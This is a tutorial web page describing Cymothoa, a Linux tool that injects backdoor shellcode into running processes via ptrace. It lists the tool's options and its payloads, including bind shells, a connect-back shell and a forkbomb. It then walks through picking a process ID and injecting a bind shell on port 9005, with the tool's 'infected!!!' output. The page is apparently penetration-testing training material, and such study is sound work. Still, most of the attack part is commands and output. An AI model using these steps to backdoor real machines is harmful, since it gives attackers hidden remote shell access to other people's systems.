Cymothoa

Description

Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them.

Usage

Syntax

cymothoa -p <pid> -s <shellcode_number> [options]

Options

Main options:
	-p	process pid
	-s	shellcode number
	-l	memory region name for shellcode injection (default /lib/ld)
	  	search for "r-xp" permissions, see /proc/pid/maps...
	-m	memory region name for persistent memory (default /lib/ld)
	  	search for "rw-p" permissions, see /proc/pid/maps...
	-h	print this help screen
	-S	list available shellcodes

Injection options (overwrite payload flags):
	-f	fork parent process
	-F	don't fork parent process
	-b	create payload thread (probably you need also -F)
	-B	don't create payload thread
	-w	pass persistent memory address
	-W	don't pass persistent memory address
	-a	use alarm scheduler
	-A	don't use alarm scheduler
	-t	use setitimer scheduler
	-T	don't use setitimer scheduler

Payload arguments:
	
	set timer (seconds)
	-k	set timer (microseconds)
	-x	set the IP
	-y	set the port number
	-r	set the port number 2
	-z	set the username (4 bytes)
	-o	set the password (8 bytes)
	-c	set the script code (ex: "#!/bin/sh\nls; exit 0")
	  	escape codes will not be interpreted...

Payloads


cyborg@cyborg:~$ sudo cymothoa -S
0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <[email protected]>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford ([email protected])
5 - script execution (see the payload), creates a tmp file you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - [email protected] [email protected]
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - [email protected]
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs ([email protected])
11 - POC alarm() scheduled shellcode
12 - POC setitimer() scheduled shellcode
13 - alarm() backdoor (requires -j -y) bind port, fork on accept
14 - setitimer() tail follow (requires -k -x -y) send data via upd

Example

Creating Cymothoa Backdoor :

Find The PID : 

cyborg@cyborg:~$ ps -ax
  PID TTY      STAT   TIME COMMAND
    1 ?        Ss     0:02 /sbin/init
    2 ?        S      0:00 [kthreadd]
    3 ?        S      0:00 [ksoftirqd/0]
    5 ?        S<     0:00 [kworker/0:0H]
    7 ?        S      0:06 [rcu_sched]
    8 ?        S      0:00 [rcuos/0]
    9 ?        S      0:00 [rcuos/1]
   10 ?        S      0:00 [rcuos/2]
   11 ?        S      0:00 [rcuos/3]
   12 ?        S      0:00 [rcu_bh]
   13 ?        S      0:00 [rcuob/0]
   14 ?        S      0:00 [rcuob/1]
   15 ?        S      0:00 [rcuob/2]
   16 ?        S      0:00 [rcuob/3]
   17 ?        S      0:00 [migration/0]
   18 ?        S      0:00 [watchdog/0]
   19 ?        S      0:00 [watchdog/1]
   20 ?        S      0:00 [migration/1]
   21 ?        S      0:00 [ksoftirqd/1]
   23 ?        S<     0:00 [kworker/1:0H]
   24 ?        S<     0:00 [khelper]
   25 ?        S      0:00 [kdevtmpfs]

Injecting Cymothoa Backdoor :

cyborg@cyborg:~$ sudo cymothoa -s 0 -p 2269 -y 9005
[+] attaching to process 2269

 register info: 
 -----------------------------------------------------------
 eax value: 0xfffffffffffffdfe	 ebx value: 0x3
 esp value: 0x7fff075d6298	 eip value: 0x7fba32bf9913
 ------------------------------------------------------------

[+] new esp: 0x7fff075d6290
[+] payload preamble: fork
[+] injecting code into 0x00f40000
[+] copy general purpose registers
[+] detaching from 2269
[+] infected!!!
0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?